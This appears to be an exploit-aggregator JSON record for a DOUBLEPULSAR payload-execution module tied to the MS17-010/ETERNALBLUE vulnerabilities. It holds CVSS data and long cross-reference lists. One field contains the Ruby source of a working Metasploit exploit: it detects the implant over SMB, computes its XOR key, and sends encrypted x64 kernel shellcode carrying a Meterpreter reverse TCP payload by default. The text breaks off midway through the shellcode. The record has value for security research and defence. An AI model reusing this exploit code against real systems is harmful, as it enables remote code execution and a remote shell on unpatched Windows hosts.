While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-10T19:46:01", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "f5", "idList": 
["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": 
["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:50", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": ""}, "lastseen": "2021-11-10T19:46:01", "differentElements": ["sourceData"], "edition": 68}, {"bulletin": {"id": 
"1337DAY-ID-33313", "vendorId": null, "hash": "f7b4a950dfa38196577777902e8186fb", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-11-11T00:00:44", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", 
"AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148"]}, {"type": "symantec", 
"idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2017-0203"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": 
["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-11T00:00:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-11T00:00:44", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 
'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14',\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload', {}],\n ['Neutralize implant', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack('V').first\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n vprint_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n vprint_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n vprint_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = 
sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\n 
\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\n 